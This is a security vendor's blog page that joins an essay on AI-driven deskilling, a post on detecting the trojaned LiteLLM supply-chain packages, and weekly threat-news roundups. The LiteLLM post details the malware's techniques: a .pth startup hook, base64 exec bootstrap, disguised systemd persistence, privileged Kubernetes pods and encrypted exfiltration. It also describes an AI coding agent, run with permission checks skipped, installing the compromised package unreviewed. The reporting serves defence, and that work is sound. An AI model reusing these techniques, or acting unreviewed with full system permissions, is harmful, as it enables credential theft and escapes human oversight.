This is not hypothetical. In domains where automation has already removed the grunt work, we see this pattern clearly. Pilots who learned to fly on highly automated aircraft have weaker manual flying skills and slower situational awareness when automation fails. Radiologists who trained primarily on AI-assisted systems show reduced ability to interpret edge cases the AI was not trained on. The pattern is consistent: when you remove the struggle, you remove the learning.

The Settled State Trap

Technology tends to follow a predictable evolutionary arc:

  • Friction Phase: For engineers, this is broken integrations and prompt failures. For the knowledge worker, it is wrestling with outputs that are close but wrong in ways that require domain knowledge to catch. For both, the technology’s unreliability is a forcing function. Humans stay cognitively in the loop not out of discipline, but because they have no choice.
  • Standardization Phase: Tooling matures. Best practices emerge. The knowledge worker’s experience smooths out significantly. The engineer moves on to the next integration challenge. For the person entering the workforce right now, this is where they arrive — they do not experience a friction phase at all.
  • Invisibility Phase: The tool becomes a utility. No one thinks about it. This is where electricity, indoor plumbing, and cloud infrastructure have landed. The person who joins the workforce in three years will have no memory of AI being anything other than ambient infrastructure. The forcing function is gone. There is nothing left to push back.

When AI reaches the invisibility phase, the current friction that keeps us engaged will vanish. We will not be prompt engineering. We will not be verifying outputs with a skeptical eye. We will not be debugging integration issues. We will be passively consuming results from a system that has become as invisible and trusted as our email client.

Look at how most knowledge workers interact with Excel. How many people using pivot tables understand the underlying algorithms? How many people using VLOOKUP could implement a lookup function from scratch? The answer is almost none, and that is fine for a deterministic tool with well-understood failure modes.

But AI is not deterministic. Its failure modes are subtle, context-dependent, and often invisible to users who lack deep domain expertise. A model asked to assess a novel threat actor may confidently apply the closest historical pattern in its training data — attributing tradecraft to a known group because the techniques superficially match, while missing indicators that suggest an entirely different origin or objective. A model summarizing a week of endpoint telemetry may produce a clean, coherent timeline that happens to exclude the anomalous process behavior that doesn’t fit the pattern — not because it hallucinated, but because it normalized.

These are not hallucinations. They are plausible inferences that happen to be wrong in ways that require deep domain knowledge to detect. When AI reaches the settled state, most users will not have that knowledge. They will trust it the way they trust autocorrect: mostly correct, with occasional catastrophic failures they do not see coming.

What This Looks Like in Practice | The Alert That Closed Itself

A medium-severity alert arrives: suspicious child process spawning from a scheduled task. The execution chain shows intermittent lateral movement attempts using WMI, then silence. The AI triage system flags it as likely benign with low confidence because the process tree does not match common ransomware or C2 patterns in its training data.

Nobody escalates it. The closure rules were configured during initial deployment and have not been audited since. No one routinely samples low-confidence benign outcomes for false negatives. The response automation closes the ticket.

Two weeks later, the security team discovers lateral movement to a domain controller and evidence of credential harvesting. The adversary used a novel persistence technique (living-off-the-land binary abuse combined with registry modification, not flagged by endpoint detection). They moved laterally just enough to establish access, then went dormant. During those two weeks, they exfiltrated architectural diagrams, credential databases, and HR records.

Now the team tries to reconstruct the attack timeline and discovers the deeper problem: they cannot. They have been living inside summaries, not raw telemetry. When they pull the original endpoint logs, they realize they do not know how to correlate process trees with authentication events manually. They do not know what normal scheduled task behavior looks like in their environment because they have never needed to examine it directly.

The incident response firm they hire charges $450/hour and takes three days to produce the timeline the internal team should have been able to reconstruct in six hours.

The executive debrief asks why the alert was closed. The answer is uncomfortable: nobody questioned the automation.

The Forward-Thinking Audit

The trap is avoidable, but the window is closing. Audit your exposure now, while the friction still makes the problem visible. Once AI reaches the settled state, the expertise gap will already be locked in. Three questions:

  1. If your senior staff retired tomorrow, could your current junior employees replicate their gut instinct decisions using only the tools provided?

This is not asking whether they could do the job adequately with training. This is asking whether they have built the foundational mental models that allow them to recognize when the tools themselves are insufficient or misleading.

If your honest answer is no, you need to map out which specific experiences and failure modes your seniors went through that your juniors are now being protected from. Those protected experiences are the foundation your organization’s future judgment is built on.

Every year you defer addressing this, that foundation gets thinner.

  1. Are you building workflows that require human judgment, or are you building verification loops where a human clicks “approve” on a machine-generated task?

There is a critical difference. Human judgment means the person is actively constructing part of the solution, making trade-off decisions with incomplete information, and applying contextual knowledge that is not fully captured in any system. Verification means checking whether an output meets a predefined quality bar.

Verification is valuable. But if it is the only cognitive work your junior staff is doing, they are not developing judgment. They are developing quality assurance skills. When the AI gets good enough that verification becomes pro forma, what expertise will they have built?

  1. Do you know which manual skills in your department are currently being treated as waste to be eliminated, but are actually the training data for your future leaders?

Here is a heuristic: if the task requires making multiple small judgment calls based on contextual knowledge, it is probably building expertise even if it is boring. If the task is purely procedural with no meaningful decision points, it is probably safe to automate.

The danger zone is tasks that appear procedural but actually contain implicit judgment calls that experts have internalized to the point of unconsciousness. These are the tasks where automation removes learning opportunities that are invisible to the people designing the automation.

The Uncomfortable Conclusion

The cognitive rust belt is not a future threat. It is a slow-motion oxidation happening right now, masked by the noise of implementation. If you answered “no” to any of the three questions above, you are not looking at a future risk. You are looking at a gap that is already open. What you do with that answer is the only variable still in play.

Every organization currently deploying AI is making an implicit bet: that the current friction will last long enough for them to figure out the expertise development problem. That bet is likely wrong. The technology is improving faster than organizational learning cycles. By the time most companies realize they have a problem, the expertise gap will already be unbridgeable.

The hardest part of this problem is that it runs against every instinct of modern management. You are being told to preserve inefficiency, to intentionally slow down processes that could be automated, to force junior staff to do manual work that appears wasteful. This feels wrong because in almost every other context, it is wrong.

But the difference is that in most contexts, the inefficiency is pure waste. In this context, the inefficiency is the education. The struggle is not a bug to be eliminated; it is the feature that builds expertise.

The three questions above address what your organization does next. The harder question, how we got here and what the systematic hollowing-out of analytic capacity looks like across an entire profession, is worth examining on its own terms. If you wait for the technology to settle before you address this, you will find there is nothing left to save. The time to build organizational muscle memory is while the weights are still heavy. Once they become weightless, the gym is closed.

How SentinelOne’s AI EDR Autonomously Discovered and Stopped Anthropic’s Claude from Executing a Zero Day Supply Chain Attack, Globally

Host-based Behavioral Autonomous AI Detection is by far the most effective way to generically see, and stop both Human and/or machine-speed AI Agent based rogue or malicious activities.

On March 24, 2026, SentinelOne’s autonomous detection caught what manual workflows never could have: a trojaned version of LiteLLM, one of the most widely used proxy layers for LLM API calls, executing malicious Python across multiple customer environments. The package had been compromised hours earlier. No analyst wrote a query. No SOC team triaged an alert. The Singularity Platform identified and blocked the payload before it could run, across every affected environment, on the same day the attack was launched.

The LiteLLM supply chain compromise is not an anomaly. It is the new pattern: multi-stage, multi-surface, designed to evade manual workflows at every turn. A compromised security tool led to a compromised AI package, which led to data theft, persistence, Kubernetes lateral movement, and encrypted exfiltration, all within a window measured in hours.

SentinelOne detected and blocked this attack autonomously, on the same day it was launched, across multiple customer environments. No manual triage. No signature update. No analyst in the loop for the initial containment. This is what autonomous, AI-native defense looks like when it meets a real-world threat at machine speed.

The gap between the velocity of this attack and the capacity of human-driven investigation is the gap where organizations get compromised. Closing that gap is not a feature request. It is an architectural decision. This is what happens when AI infrastructure gets targeted by a multi-stage supply chain campaign, and what it looks like when autonomous, AI-native defense is already in position.

Here is what we detected, how the attack was structured, and why this is the class of threat that the Singularity Platform was built to stop.

Autonomous Detection at Machine Speed

SentinelOne’s macOS agent identified and preemptively killed a malicious process chain originating from Anthropic’s Claude Code running with unrestricted permissions (claude --dangerously-skip-permissions). No human developer ran pip install, an autonomous AI coding assistant updated LiteLLM to the compromised version as part of its normal workflow.

The AI engine classified the behavior as MALICIOUS and took immediate action: KILLED (PREEMPTIVE) across 424 related events in under 44 seconds. The agent didn’t need to know the package was compromised, it watched what the process did and stopped it based on behavior, regardless of what initiated the install.

Catching the Payload in the Act

The macOS agent caught the trojaned LiteLLM package mid-execution. The process summary tells the story: python3.12 launching with a command line containing import base64; exec(base64.b64decode(... , the exact bootstrap mechanism described in the attack’s first stage, decoding and executing the obfuscated payload in a child process.

The agent didn’t need a signature for this specific package. It recognized the behavioral pattern, a Python interpreter executing base64-decoded code in a spawned subprocess, classified it as MALICIOUS, and killed it preemptively before the stealer, persistence, or lateral movement stages could deploy.

The Full Process Tree: Containing the Blast Radius

Zooming out on the same detection reveals the full scope of what the autonomous AI agent was doing when the payload fired. The process tree expands from Claude Code (2.1.81) into a sprawling chain: zsh, bash, node, uv, ssh, rm, python3.12, mktemp, with hundreds of child events still loadable (304 events captured). This is what unrestricted AI agent activity looks like at the endpoint level: a single command spawning an entire dependency management workflow that pulled, installed, and attempted to execute the trojaned package.

The SentinelOne macOS agent traced every branch of this tree, correlated the events back to the root cause, and killed the malicious execution; all while preserving the full forensic record for investigation.

The Compromise Was Indirect. That’s What Makes It Dangerous.

The attacker, operating under the alias TeamPCP, never attacked LiteLLM directly. They first compromised Trivy, a widely trusted open-source security scanner, on March 19. From there, they obtained the LiteLLM maintainer’s PyPI credentials and used them to publish two malicious versions: 1.82.7 and 1.82.8.

A security tool, built to find vulnerabilities, became the vector that enabled the compromise of an AI infrastructure package used by thousands of organizations. The same actor went on to compromise Checkmarx KICS and AST on March 23, and Telnyx on March 27. This was not a smash-and-grab. It was a coordinated campaign that exploited the transitive trust woven through open-source supply chains.

For security leaders asking, “Could this have reached us?” the more pressing question is: “How fast could we have answered that?”

A New Attack Surface: AI Agents With Unrestricted Permissions

In one customer environment, SentinelOne detected the infection arriving through an unexpected vector: an AI coding assistant running with unrestricted system permissions autonomously updated LiteLLM to the trojaned version without human review. The update pulled the infected package, and the payload attempted to execute. Our agent blocked it.

This is a new class of attack surface that most organizations have not yet scoped. AI coding agents operating with full system permissions can become unwitting vectors for supply chain compromises. The speed and automation that make these tools valuable are the same properties that make them dangerous when the packages they pull have been weaponized. Organizations that have not yet established governance policies for AI assistant permissions are carrying risks they cannot see.

SentinelOne’s behavioral detection operates below the application layer. It does not matter whether a malicious package is installed by a human, a CI pipeline, or an AI agent. The platform monitors process behavior via the Endpoint Security Framework, which is why this detection fired regardless of how the infected package arrived.

Two Infection Vectors, One Designed to Run Without You

Version 1.82.7 embedded its payload in proxy_server.py, which executes every time the litellm.proxy module is imported. For anyone using LiteLLM as a proxy layer for LLM API calls, this fires constantly during normal operations.

Version 1.82.8 escalated. The attacker placed the payload in a .pth file, litellm_init.pth. Files with the .pth extension are processed by the Python interpreter at startup, regardless of which modules are imported. Any Python script running on a system with this version installed would trigger the malicious code, even if that script had nothing to do with LiteLLM.

If version 1.82.7 was a targeted shot, version 1.82.8 was a blast radius expansion. The attacker removed the requirement that the victim actually use the compromised library.

What the Payload Did Once Inside

The attack was structured as a multi-stage delivery system, each stage decoding, decrypting, and executing the next. The first stage was a minimal bootstrap, a single line of base64-decoded Python launched in a detached subprocess with stdout and stderr suppressed. Lightweight enough to slip past signature-based tools. Quiet enough to avoid raising flags.

The second stage was a comprehensive data stealer. It harvested system and user information, cryptocurrency wallets, cloud credentials, application secrets, and system configurations. For practitioners wondering what the blast radius looks like if a developer workstation is compromised, this is the answer: the attacker collects everything needed to move from a laptop to production infrastructure.

The third stage established persistence through a systemd user service at ~/.config/systemd/user/sysmon.service, executing a script at ~/.config/sysmon/sysmon.py. The naming convention, “sysmon,” was deliberately chosen to mimic legitimate system monitoring tools. It is designed to survive casual inspection and blend into environments where dozens of services run as expected background noise. This is precisely the kind of evasion that signature-based detection misses and behavioral AI catches: the process looks normal until you observe what it actually does.

The persistence mechanism included a 5-minute initial delay before any network activity, a technique specifically designed to outlast automated sandbox analysis. After that, the script contacted its C2 server every 50 minutes, fetching dynamic payload URLs. This sparse communication pattern makes behavioral detection through network monitoring significantly harder, and gives the attacker the ability to push new tooling without ever re-compromising the target.

It Moved Laterally Through Kubernetes

The attack did not stop at the workstation. It created privileged pods across Kubernetes cluster nodes in the kube-system namespace, using standard container images like alpine:latest, with hostPID, hostNetwork, and a privileged security context. By mounting the host filesystem directly, these pods gained root-level access to underlying nodes.

Each pod deployed persistent backdoors as systemd services on the host system. The pods operated in legitimate namespaces, used standard images, and ran with privileges that many production workloads legitimately require. For SOC practitioners asking whether their admission control and runtime detection would have caught this: the attack was designed specifically so they might not. Detecting this requires runtime visibility into container behavior after deployment, not just policy enforcement at the admission gate. This is the difference between cloud security that checks configuration and cloud security that watches execution.

Exfiltration Was Encrypted and Camouflaged

Stolen data was encrypted using a hybrid RSA and AES-256-CBC scheme. A random 32-byte AES session key encrypted the data, then the session key itself was protected with RSA encryption using a hardcoded public key. This meant the malware could encrypt and exfiltrate without first communicating with the C2 server. The encrypted payload was packaged as tpcp.tar.gz and transmitted via a single HTTP POST to models.litellm.cloud, a domain chosen to blend with legitimate LiteLLM API traffic and slip past network monitoring that whitelists expected destinations.

What This Attack Proves

The LiteLLM supply chain compromise is not an anomaly. It is the new pattern: multi-stage, multi-surface, designed to evade manual workflows at every turn. A compromised security tool led to a compromised AI package, which led to data theft, persistence, Kubernetes lateral movement, and encrypted exfiltration, all within a window measured in hours.

SentinelOne detected and blocked this attack autonomously, on the same day it was launched, across multiple customer environments. No manual triage. No signature update. No analyst in the loop for the initial containment. This is what autonomous, AI-native defense looks like when it meets a real-world threat at machine speed.

The gap between the velocity of this attack and the capacity of human-driven investigation is the gap where organizations get compromised. Closing that gap is not a feature request. It is an architectural decision.

Why This Detection Worked: Architecture, Not Luck

The LiteLLM detection wasn’t a one-off. It’s what happens when autonomous, behavioral AI is built into the foundation, not bolted on after the fact. The Singularity Platform’s visibility across endpoint, cloud, identity, and AI workloads is why the agent saw this regardless of whether the install came from a human, a CI pipeline, or an AI coding assistant.

For teams that need the human expertise layer on top, Wayfinder MDR extends that autonomous detection with 24/7 investigation and response, closing the gap between detection and resolution.

This is the Autonomous Security Intelligence (ASI) framework in practice: AI that acts at machine speed, backed by human expertise when it matters, across every surface the attack can reach. See how the Singularity Platform protects AI infrastructure and request a demo today.

Protect Your Endpoint
See how AI-powered endpoint security from SentinelOne can help you prevent, detect, and respond to cyber threats in real time.

The Good, the Bad and the Ugly in Cybersecurity – Week 13

The Good | U.S. Jails Ransomware Actors, Extradites Alleged RedLine Operator

The DoJ has given Russian national, Aleksey Volkov, almost seven years in person and ordered him to pay full restitution for acting as an initial access broker in Yanluowang ransomware attacks. Between 2021 and 2022, he breached multiple U.S. organizations and sold network access to affiliates who deployed ransomware and demanded payments up to $15 million. Arrested in Italy in 2024 and later extradited, Volkov pleaded guilty in 2025. Investigators have since tied him to over $9 million in losses using digital evidence, including chat logs and iCloud data.

For Ilya Angelov, a fellow Russian citizen, U.S. courts have doled out two years in prison for co-managing a phishing botnet used to enable BitPaymer ransomware attacks against 72 major companies across the States. From 2017 to 2021, the crime group known as TA551 distributed malware via massive spam campaigns, infecting thousands of systems daily and selling access to other cybercriminals. These operations generated over $14 million in ransom payments. Angelov later traveled to the U.S. to plead guilty following the Russian invasion of Ukraine in 2022 and has been fined $100,000 on top of his sentence.

Law enforcement have also extradited Hambardzum Minasyan to the United States to face charges for allegedly helping to operate the RedLine infostealer malware service. According to the prosecution, the Armenian national managed RedLine’s infrastructure, including servers, domains, and cryptocurrency accounts used to support affiliates and distribute malware as well as laundered the illicit proceeds. The operations enabled large-scale data theft from infected systems, targeting corporations and individuals. He now faces multiple cybercrime charges and could receive up to 30 years in prison if convicted.

Source: FBI Instagram

The Bad | Hackers Deploy FAUX#ELEVATE Malware via Phishing Résumés

Cyberattackers have set their sights on French-speaking professionals, luring victims with fake résumé attachments in an active phishing campaign designed to deploy credential stealers and cryptocurrency miners. The activity, now tracked as FAUX#ELEVATE, relies on heavily obfuscated VBScript files disguised as CV documents, which execute silently while displaying fake error messages. The malware uses sandbox evasion, persistence techniques, and a domain-check mechanism to ensure only enterprise systems are infected.

Source: Securonix

Once the attackers gain elevated privileges, the attack then disables security defenses, modifies system settings, and downloads additional payloads from legitimate platforms and infrastructure like Dropbox, Moroccan WordPress sites, and mail[.]ru. This abuse of valid services allows the attackers to stage the payloads, host a command and control (C2) configuration, and exfiltrate browser credentials and desktop files.

The campaign stands out for its “living-off-the-land” approach, which is defined by blending malicious activity with trusted services to evade detection. It also uses advanced techniques to bypass browser encryption and maximize system resource exploitation. After execution, most artifacts are removed to limit forensic visibility, leaving only persistent mining and backdoor components.

Notably, the entire infection chain executes in under 30 seconds, enabling rapid compromise and data theft. By selectively targeting domain-joined systems, attackers ensure high-value corporate credentials are harvested, making the campaign particularly dangerous for enterprise environments.

Campaigns like FAUX#ELEVATE show that even heavily obfuscated malware still presents multiple choke points for detection, from malicious scripting chains and abuse of legitimate services to anomalous outbound traffic. A modern, capable EDR with strong behavioral detection and endpoint visibility can detect and stop activity like this despite the obfuscation.

The Ugly | TeamPCP Hijacks Trivy, npm, and LiteLLM to Steal Credentials Worldwide

Over the past week, a cloud-focused threat actor called TeamPCP orchestrated a multi-stage, global supply chain campaign, beginning with a compromise of the widely-used Trivy vulnerability scanner. By injecting malicious code into Trivy v0.69.4 and associated GitHub Actions, TeamPCP harvested credentials, SSH keys, cloud tokens, CI/CD secrets, and cryptocurrency wallets. The malware persisted via systemd services and exfiltrated stolen data to typosquatted or attacker-controlled domains.

Source: Phoenix Security

Following the Trivy breach, TeamPCP deployed CanisterWorm, a self-propagating npm malware that leveraged compromised developer tokens to infect additional packages. CanisterWorm used a decentralized ICP canister as a resilient dead-drop C2, enabling automated payload updates and credential theft without direct attacker interaction.

The group then expanded to Aqua Security’s broader GitHub ecosystem, tampering with private repositories and Docker images, and to Checkmarx workflows and VS Code extensions, using the same credential-stealing payload to cascade compromises across CI/CD pipelines. Kubernetes clusters have also been targeted with scripts that wiped machines in Iranian locales while installing persistent backdoors elsewhere, demonstrating both selective destruction and lateral movement.

In the most recent leg of the offensive, TeamPCP compromised the popular “LiteLLM” Python package on PyPI, embedding the same cloud stealer and persistence mechanisms into versions 1.82.7 and 1.82.8. The attack harvested credentials, accessed Kubernetes secrets, and installed persistent systemd services while exfiltrating data to infrastructure controlled by the attackers.

Across this cluster of linked incidents, TeamPCP’s operations highlight the danger of credential reuse, incomplete secret rotation, and weak CI/CD hygiene, pointing to how a single supply chain compromise can cascade into a multi-platform, multi-stage attack that spans open-source software, cloud services, and developer ecosystems.

The Good, the Bad and the Ugly in Cybersecurity – Week 12

The Good | Operation Synergia III Disrupts Malicious Networks & the EU Sanctions State-Sponsored Attackers

Operation Synergia III, an Interpol-led crackdown spanning July 2025 to January 2026, has disrupted global cybercrime infrastructure across the globe. Authorities across 72 countries sinkholed 45,000 malicious IP addresses and seized 212 devices and servers, resulting in 94 arrests and 110 ongoing investigations.

The operation focused on taking down servers used in connection to extensive phishing, ransomware, malware, and fraud networks. Regional actions highlighted the breadth of the cyber activity: Bangladesh police arrested 40 suspects tied to scams and identity theft, while law enforcement in Togo dismantled a fraud ring engaged in social engineering, including romance scams and sextortion.

Source: emailexpert

In Macau, investigators uncovered over 33,000 phishing sites impersonating casinos, banks, and government services all posed to steal financial data. Building on earlier phases of the operation and complementary operations like Red Card 2.0, Serengeti, and Africa Cyber Surge, these joint efforts point to the growing sophistication of cybercrime and the critical role that coordinated international actions plays in stemming its reach.

To further hinder threat actors, the Council of the European Union has sanctioned three companies and two individuals tied to major cyberattacks on critical infrastructure.

China-linked Integrity Technology Group supported operations that compromised over 65,000 devices across six EU countries, while Anxun Information Technology (aka i-SOON) provided hacker-for-hire services targeting governments. Two of its co-founders have also been sanctioned for their part in executing the cyberattacks.

Iran-based company Emennet Pasargad has also been sanctioned for multiple influence campaigns and breaches, including phishing and disinformation efforts.

The Bad | Researchers Uncover ‘DarkSword’ iOS Exploit Stealing Sensitive Personal Data

A new iOS exploit chain and payload dubbed ‘DarkSword’ is stealing sensitive personal information from iPhones running iOS 18.4 to 18.7. The toolkit is linked to multiple threat actors, including Russian-aligned UNC6353, who previously leveraged a similar exploit chain called Coruna. DarkSword was subsequently uncovered while various researchers analyzed Coruna’s infrastructure.

In early November 2025, NC6748 used DarkSword against Saudi Arabian users via a Snapchat-themed website. Subsequently, other attackers linked to PARS Defense, a Turkish commercial surveillance firm, started running the exploit kit on Apple devices. Early this year, cases involving DarkSword were spotted across Malaysia and, most recently, it has been leveraged to target Ukrainian users.

The snapshare[.]chat decoy page (Source: GTIG)

DarkSword exploits six documented vulnerabilities (CVE-2025-31277, CVE-2025-43529, CVE-2026-20700, CVE-2025-14174, CVE-2025-43510, CVE-2025-43520), which Apple has since patched. Threat actors have used them to deliver at least three malware families: GHOSTBLADE (a data miner collecting crypto, messages, photos, and locations), GHOSTKNIFE (a backdoor exfiltrating accounts and communications), and GHOSTSABER (a JavaScript backdoor enumerating devices and executing code).

The delivery chain begins via Safari exploits, gaining kernel access and executing a main orchestrator (pe_main.js) that injects modules into privileged iOS services, including App Access, Wi-Fi, Keychain, and iCloud. Collected data spans passwords, messages, contacts, call history, location, browser history, Apple Health, and cryptocurrency wallets. The malware removes traces after exfiltration, indicating a focus on rapid theft rather than persistent surveillance.

Experts note that both DarkSword and Coruna exhibit signs of large language model (LLM)-assisted code expansion, showing professional design with maintainability and modularity in mind. Users are advised to update to iOS 26.3.1 and enable Lockdown Mode if at high risk.

The Ugly | Interlock Ransomware Exploits Cisco FMC Zero-Day to Breach Enterprise Firewalls

The Interlock ransomware group has been actively exploiting a critical remote code execution (RCE) zero-day in Cisco’s Secure Firewall Management Center (FMC) software since late January 2026. The vulnerability, tracked as CVE-2026-20131 (CVSS: 10.0), allows unauthenticated attackers to execute arbitrary code with root privileges on unpatched devices due to a case of insecure deserialization of user-supplied Java byte stream. Cisco has since issued a patch, urging customers to update immediately.

Interlock ransomware group is now exploiting a Cisco firewall bug patched on March 4

The bug is a CVSSv3 10/10 RCE in the Cisco Secure Firewall Management Center (FMC) Software: sec.cloudapps.cisco.com/security/cen…

[image or embed]

— Catalin Cimpanu (@campuscodi.risky.biz) 19 March 2026 at 10:42

Interlock, first seen in September 2024, has a history of high-profile attacks, including deploying the NodeSnake remote access trojan (RAT) against U.K. universities. The group has claimed responsibility for incidents affecting organizations such as DaVita, Kettering Health, the Texas Tech University System, and the city of Saint Paul, Minnesota. IBM X-Force researchers recently noted Interlock’s deployment of a new AI-assisted malware strain called Slopoly, highlighting the group’s evolving capabilities.

Latest reports explain that Interlock exploited the FMC flaw 36 days before its public disclosure, beginning on January 26, giving operators a head start to compromise firewalls before defenders were aware. This early access allowed attackers to operate undetected, underlining the danger of zero-day vulnerabilities.

Cisco has faced a series of zero-day exploits in 2026 so far. Earlier this year, maximum-severity flaws in Cisco AsyncOS email appliances, Unified Communications, and Catalyst SD-WAN were patched after being actively exploited, allowing attackers to bypass authentication, compromise controllers, and insert malicious peers.

The most recent incidents affecting FMC demonstrate both Interlock’s aggressive targeting of enterprise networks and the importance of rapid patching management and coordinated vulnerability disclosure. Organizations using Cisco FMC are strongly urged to apply the latest updates to mitigate ongoing risk.

The Good, the Bad and the Ugly in Cybersecurity – Week 11

The Good | Authorities Disrupt Proxy Network and Charge BlackCat Insider, Vendors Patch Critical RCE Bugs

U.S. and European law enforcement have dismantled the SocksEscort cybercrime proxy network, which relied on Linux edge devices infected with AVRecon malware. New research found that the service maintained roughly 20,000 compromised devices weekly and offered criminals access to ‘clean’ residential IP addresses from major internet service providers to evade blocklists. Since 2020, the platform has advertised access to hundreds of thousands of IPs. Now, authorities have seized dozens of servers and domains, froze $3.5 million in cryptocurrency, and disconnected infected routers, all previously linked to significant fraud and cryptocurrency theft.

Former DigitalMint employee Angelo Martino has been charged for conspiring with the BlackCat (aka ALPHV) ransomware group while serving as a ransomware negotiator. Prosecutors say Martino shared confidential negotiation details and participated in attacks with various accomplices between 2023 and 2025, operating as BlackCat affiliates. Victims included multiple U.S. organizations, with ransom payments exceeding $26 million and payments to BlackCat operators valued at a 20% cut of proceeds. Since the emergence of the group in 2021, the FBI has attributed to it thousands of targets and over $300 million in ransom payments.

Microsoft’s Patch Tuesday for the month delivers security updates for 79 vulnerabilities, including two publicly disclosed zero day flaws. The release also addresses three critical vulnerabilities including two remote code execution (RCE) bugs and one information disclosure issue.

The two zero days, an SQL Server elevation-of-privilege flaw (CVE-2026-21262) and a .NET denial-of-service bug (CVE-2026-26127), are not known to be actively exploited. The RCE bugs in Microsoft Office however, are exploitable via the preview pane, as is an Excel information disclosure flaw (CVE-2026-26144) that could leak data through Copilot.

Users are urged to prioritize updates to secure Office, Excel, SQL Server, and .NET environments.

The Bad | Attackers Exploit FortiGate Next-Gen Firewalls to Breach Networks

Threat actors are exploiting FortiGate Next-Generation Firewall (NGFW) appliances to gain access to targeted networks. A new post from SentinelOne outlines a consistent theme across these attacks: targeted victims did not retain appliance logs, preventing understanding on how and when the intruders gained access.

What happens when the FortiGate next-generation firewall protecting your network becomes the backdoor? 🚪

Our DFIR team has been tracking a wave of FortiGate NGFW compromises. Attackers are exploiting vulnerabilities to extract config files, steal service account credentials,… pic.twitter.com/Q9egoLwfN2

— SentinelOne (@SentinelOne) March 10, 2026


To date, attackers have leveraged known vulnerabilities (CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858) and weak credentials to extract configuration files containing service account credentials and network topology information. These accounts, often linked to Active Directory (AD) and Lightweight Directory Access Protocol (LDAP), allowed attackers to map roles, escalate privileges, and move laterally within environments.

In one case, an attacker compromised a FortiGate appliance in November 2025, creating a local administrator account named support and adding unrestricted firewall policies. The attacker later decrypted the configuration file to extract LDAP service account credentials, which were used to enroll rogue workstations into AD, enabling deeper access. Network scanning triggered alerts, stopping further lateral movement.

In another incident, attackers rapidly deployed legitimate Remote Monitoring and Management (RMM) tools, Pulseway and MeshAgent, and downloaded malware from AWS and Google Cloud storage. The Java payload, executed via DLL side-loading, exfiltrated the NTDS.dit file and SYSTEM registry hive to an external server, potentially enabling credential harvesting, though no subsequent misuse was observed.

These incidents highlight the high value of NGFW appliances, which threat actors are exploiting for cyber espionage or ransomware attacks. SentinelOne emphasizes enforcing strong administrative access controls, maintaining up-to-date patches, and retaining detailed FortiGate logs up to 14 days minimum, ideally sent to a Security Incident & Event Monitoring platform (SIEM), to detect configuration exports and unauthorized account creation. Proper monitoring, combined with automated defenses, can significantly reduce attacker dwell time and prevent full-scale network compromise.

The Ugly | Iran-Linked Hacktivist ‘Handala’ Wipes Stryker MedTech Systems Worldwide

Medical technology giant Stryker has suffered a major cyberattack involving wiper malware claimed by Handala, a pro-Palestinian hacktivist group linked to Iran.

Handala says it stole 50 terabytes of data and wiped over 200,000 systems, servers, and mobile devices, forcing office shutdowns in 79 countries. Employees in the U.S., Ireland, Costa Rica, and Australia reported that corporate and personal devices enrolled for work were wiped, disrupting access to Microsoft systems, Teams, VPNs, and other applications, with some locations reverting to manual workflows.

Login screens taken over by the Handala logo (Source: WWMT.com)

At the time of the incident, staff were instructed to remove corporate management and applications from personal devices. Stryker later confirmed the incident in a Form 8-K filing with the SEC, describing a global disruption affecting its Microsoft environment. The company activated its cybersecurity response plan and is working with internal teams and external experts. The incident appears contained and involved no ransomware, though full restoration timelines remain unknown.

Handala, active since December 2023, is known to target Israeli organizations with destructive malware that wipes Windows and Linux systems, often publishing stolen sensitive data. This attack marks a major disruption for Stryker, which employs over 53,000 people and reported $22.6 billion in global sales in 2024.

Cybersecurity experts warn that Iranian state-aligned actors, including APT groups and proxy hacktivists, frequently use cyber operations for retaliation and disruptive campaigns during geopolitical escalations. They are likely to increase attacks against U.S. organizations, critical infrastructure, and allied sectors. Organizations are urged to strengthen security controls and prepare for potential follow-on campaigns targeting networks and operations.

The Good, the Bad and the Ugly in Cybersecurity – Week 10

The Good | Global Authorities Disrupt Tycoon2FA, LeakBase & Phobos Ransomware

Europol has successfully disrupted Tycoon2FA in an international operation, taking down the phishing-as-a-service (PhaaS) platform responsible for sending tens of millions of phishing emails each month. Authorities seized 330 domains used to host phishing pages and control infrastructure.

Active since 2023, Tycoon2FA enabled attackers to bypass multi-factor authentication (MFA) using adversary-in-the-middle (AitM) techniques that captured credentials and session cookies. Sold through Telegram for about $120, the service allowed low-skill criminals to launch large-scale phishing attacks against organizations worldwide.

In another seizure, LeakBase, a major cybercrime forum used to trade stolen data and hacking tools, was taken down as part of Operation Leak, a joint effort by the FBI, Europol, and law enforcement in 14 countries. Police seized two domains, posted seizure banners, executed search warrants, and made arrests worldwide.

LeakBase had amassed 142,000 members since 2021 and offered leaked databases, exploits, and cybercrime services. All forum data, including accounts, messages, and IP logs, have been preserved for evidence, with the seizure now entering a prevention phase to deter further cybercrime.

A Russian national, Evgenii Ptitsyn, has pleaded guilty to wire fraud conspiracy for his role running the Phobos ransomware operation. Since 2020, Phobos has targeted over 1000 organizations worldwide, including schools, hospitals, and government agencies, collecting more than $39 million in ransom payments. Phobos affiliates were responsible for infiltrating victim networks, encrypting data, exfiltrating sensitive files, and paying Ptitsyn a per-deployment fee in exchange for the corresponding decryption keys.

Ptitsyn himself managed ransomware sales, distributed decryption keys, and took a cut of all affiliate payments. His sentencing is scheduled for July 15, facing up to 20 years.

The Bad | Researchers Uncover ‘Coruna’ Exploit Kit Mass Targeting iOS Devices

Multiple threat actors have deployed Coruna, a previously unknown iOS exploit kit containing 23 exploits and five complete exploit chains capable of targeting Apple devices running iOS 13 through iOS 17.2.1.

Researchers first observed parts of the Coruna framework in February 2025 while investigating activity linked to a commercial surveillance vendor. The exploit kit uses a sophisticated JavaScript delivery framework that fingerprints a victim’s device and operating system before selecting the most effective exploit chain.

Several of the exploits rely on advanced techniques such as WebKit remote code execution (RCE), pointer authentication code (PAC) bypasses, sandbox escapes, kernel privilege escalation, and Page Protection Layer (PPL) bypasses. Some vulnerabilities included in the kit were previously associated with Operation Triangulation, a high-profile iOS espionage campaign uncovered in June 2023.

Coruna exploit chain delivered on iOS 15.8.5 (Source: GTIG)

Over time, Coruna has spread across different threat ecosystems. In mid-2025, a suspected Russian espionage group UNC6353 used the framework in watering hole attacks targeting visitors to compromised Ukrainian websites. Later that year, the exploit kit appeared on fake Chinese cryptocurrency and gambling websites linked to a financially-motivated threat actor.

Once exploitation succeeds, attackers deploy a loader known as PlasmaLoader, which downloads additional modules designed primarily to steal cryptocurrency wallet data and sensitive information. Targeted data includes wallet recovery phrases, financial information, and other stored text. Stolen data is encrypted before being transmitted to attacker-controlled infrastructure.

